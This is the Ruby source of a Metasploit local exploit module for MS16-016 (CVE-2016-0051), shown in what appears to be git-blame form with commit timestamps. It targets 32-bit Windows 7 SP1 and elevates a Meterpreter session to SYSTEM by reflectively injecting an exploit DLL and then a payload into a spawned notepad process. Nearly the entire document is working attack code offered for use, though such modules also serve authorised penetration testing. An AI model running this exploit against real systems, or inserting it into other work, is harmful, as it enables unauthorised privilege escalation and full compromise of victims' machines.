2016-07-06 01:50:43 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/post/windows/reflective_dll_injection'
|
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Local
|
|
|
|
Rank = ExcellentRanking
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::Priv
|
|
|
|
include Msf::Post::Windows::Process
|
|
|
|
include Msf::Post::Windows::FileInfo
|
|
|
|
include Msf::Post::Windows::ReflectiveDLLInjection
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info, {
|
|
|
|
'Name' => 'MS16-016 mrxdav.sys WebDav Local Privilege Escalation',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn
|
|
|
|
a process on the target system and elevate it's privileges to NT AUTHORITY\SYSTEM before executing
|
|
|
|
the specified payload within the context of the elevated process.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Tamas Koczka', # Original Exploit
|
|
|
|
'William Webb <william_webb[at]rapid7.com>' # C port and Metasploit module
|
|
|
|
],
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'win',
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
'DisablePayloadHandler' => 'false'
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows 7 SP1', { } ]
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 4096,
|
|
|
|
'DisableNops' => true
|
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2016-0051' ],
|
2016-07-06 17:00:20 +00:00
|
|
|
[ 'MSB', 'MS16-016' ]
|
2016-07-06 01:50:43 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Feb 09 2016',
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
}))
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
2016-10-28 22:11:20 +00:00
|
|
|
if sysinfo["Architecture"] == ARCH_X64
|
2016-07-06 01:50:43 +00:00
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
2016-07-06 17:00:20 +00:00
|
|
|
|
|
|
|
Exploit::CheckCode::Detected
|
2016-07-06 01:50:43 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
if is_system?
|
|
|
|
fail_with(Failure::None, 'Session is already elevated')
|
|
|
|
end
|
|
|
|
|
2016-10-28 22:11:20 +00:00
|
|
|
if sysinfo["Architecture"] == ARCH_X64
|
2016-07-06 01:50:43 +00:00
|
|
|
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Launching notepad to host the exploit...")
|
|
|
|
notepad_process_pid = cmd_exec_get_pid("notepad.exe")
|
|
|
|
begin
|
|
|
|
process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS)
|
|
|
|
print_good("Process #{process.pid} launched.")
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError
|
|
|
|
print_status("Operation failed. Hosting exploit in the current process...")
|
|
|
|
process = client.sys.process.open
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
|
|
|
library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2016-0051", "cve-2016-0051.x86.dll")
|
|
|
|
library_path = ::File.expand_path(library_path)
|
|
|
|
exploit_mem, offset = inject_dll_into_process(process, library_path)
|
|
|
|
print_status("Exploit injected ... injecting payload into #{process.pid}...")
|
|
|
|
payload_mem = inject_into_process(process, payload.encoded)
|
|
|
|
thread = process.thread.create(exploit_mem + offset, payload_mem)
|
|
|
|
sleep(3)
|
|
|
|
print_status("Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|